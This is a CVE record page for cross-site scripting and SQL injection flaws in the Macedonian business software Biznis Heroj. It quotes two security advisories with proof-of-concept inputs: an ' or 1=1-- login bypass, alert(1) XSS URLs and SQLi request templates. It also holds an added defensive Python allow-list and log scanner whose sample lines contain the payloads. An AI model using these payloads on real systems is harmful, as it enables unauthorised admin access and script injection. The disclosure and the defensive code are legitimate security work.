CVE-2011-5040
Description
Multiple cross-site scripting (XSS) vulnerabilities in Infoproject Biznis Heroj allow remote attackers to inject arbitrary web script or HTML via the config parameter to (1) nalozi_naslov.php and (2) widget.dokumenti_lista.php.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Infoproject Business Hero - Multiple Vulnerabilities
Infoproject Biznis Heroj (login.php) Authentication Bypass Vulnerability
Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra
Summary: Biznis Heroj or Business Hero (Бизнис Херој) is the first
software on the Macedonian market that will help you manage your
business processes in your company, such as accounting, production,
acquisition, archiving, inventory, and the Cloud. Using the Cloud
technology, Biznis Heroj allows you to access the system from any
computer at any time through any internet browser.
Desc: The vulnerability is caused by an error in the logon
authentication script (login.php) and can be exploited to bypass
the login procedure by defining the 'username' and 'password' POST
parameters with an SQL Injection attack, gaining admin privileges.
Tested on: Apache, PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Vendor status:
[14.12.2011] Vulnerability discovered.
[15.12.2011] Contact with the vendor.
[20.12.2011] No response from the vendor.
[21.12.2011] Public security advisory released.
Advisory ID: ZSL-2011-5065
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5065.php
14.12.2011
---
PoC:
https://[TARGET]/login.php
Username: ' or 1=1--
Password: ' or 1=1--
Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities
Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra
Summary: Biznis Heroj or Business Hero (Бизнис Херој) is the first
software on the Macedonian market that will help you manage your
business processes in your company, such as accounting, production,
acquisition, archiving, inventory, and the Cloud. Using the Cloud
technology, Biznis Heroj allows you to access the system from any
computer at any time through any internet browser.
Desc: Input passed via the 'filter' parameter in 'widget.dokumenti_lista.php'
and the 'fin_nalog_id' parameter in 'nalozi_naslov.php' is not properly sanitised
before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code. The 'config' parameter
in 'nalozi_naslov.php' and 'widget.dokumenti_lista.php' is vulnerable to an XSS
issue where the attacker can execute arbitrary HTML and script code in a user's
browser session in the context of an affected site.
Tested on: Apache, PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Vendor status:
[14.12.2011] Vulnerability discovered.
[15.12.2011] Contact with the vendor.
[20.12.2011] No response from the vendor.
[21.12.2011] Public security advisory released.
Advisory ID: ZSL-2011-5064
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5064.php
14.12.2011
---
XSS:
https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=alert(1);
https://[TARGET]/widgets/widget.dokumenti_lista.php?config=alert(1);&bl=porackakupuvac&framenum=1
SQLi:
- POST https://[TARGET]/widgets/widget.dokumenti_lista.php
action=dok_naslov_lista_sindzir&config=porackakupuvac&grid_strana=celen&
bl=porackakupuvac&magacin_id=1&magacin_config=1&magacin_celen_id=1&magacin_celen_config=1&
magacin_izvoren_id=1&magacin_izvoren_config=1&dokument_tip_id=PORACKAKUPUVACML&
dokument_tip_config=PORACKAKUPUVACML&dokument_tip_celen_id=PORACKAKUPUVACML&
dokument_tip_celen_config=PORACKAKUPUVACML&dokument_tip_izvoren_id=PORACKAKUPUVACML&
dokument_tip_izvoren_config=PORACKAKUPUVACML&dokument_tip_sleden_id=NALOGISPORAKA&
order=dok_naslov.datum_dokument desc, dok_naslov.sifra desc &
filter=dok_naslov.datum_dokument between '2011-11-15' and '2011-12-15'&offset=&
limit=50&widget=1
- GET https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140[SQLi]&config=default
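Added example, not part of the advisory, the CVE record or the vendor's code: a defender-side allow-list over the parameters the advisory names, usable for access-log review or as a virtual patch at a reverse proxy while no vendor fix is published. The script paths and the legitimate values come from the PoC requests above; the parameter grammar and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list per script for the parameters the advisory names. The shapes are an
# assumption derived from the legitimate PoC values (config=default/porackakupuvac,
# fin_nalog_id=140, filter=<column> between '<date>' and '<date>'); tune to real traffic.
_IDENT = re.compile(r"[a-z_]{1,32}")
_DATE = r"'\d{4}-\d{2}-\d{2}'"
RULES = {
    "/prg_finansovo/nalozi_naslov.php": {
        "config": _IDENT,
        "fin_nalog_id": re.compile(r"\d{1,10}"),
    },
    "/widgets/widget.dokumenti_lista.php": {
        "config": _IDENT,
        "filter": re.compile(rf"dok_naslov\.datum_dokument between {_DATE} and {_DATE}"),
    },
}

# Apache common/combined log line: client ident user [time] "METHOD target HTTP/x" ...
_LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def check_query(path, query):
    """Return [(param, decoded_value)] for values violating the allow-list for `path`.
    Works for a GET query string or a urlencoded POST body; unknown scripts/params are ignored."""
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes the values
    return [(name, v) for name, pat in RULES.get(path, {}).items()
            for v in params.get(name, []) if not pat.fullmatch(v)]

def scan_access_log(lines):
    """Return [(client_ip, path, findings)] for logged GET requests that violate a rule.
    POST bodies (where the widget SQLi is sent) are not logged; run check_query() on them at the proxy."""
    hits = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        findings = check_query(url.path, url.query)
        if findings:
            hits.append((m["ip"], url.path, findings))
    return hits

# Constructed sample lines (not real traffic): one clean request and two offending ones.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Dec/2011:10:00:01 +0000] "GET /prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=default HTTP/1.1" 200 4120',
    '203.0.113.9 - - [21/Dec/2011:10:00:02 +0000] "GET /prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=alert(1); HTTP/1.1" 200 4130',
    '203.0.113.9 - - [21/Dec/2011:10:00:03 +0000] "GET /prg_finansovo/nalozi_naslov.php?fin_nalog_id=140%27%20or%201%3D1--&config=default HTTP/1.1" 200 9001',
]
```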
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| infoproject | biznis_heroj | | |
References
- http://www.exploit-db.com/exploits/18259
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5064.php
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71928
CWEs
CWE-79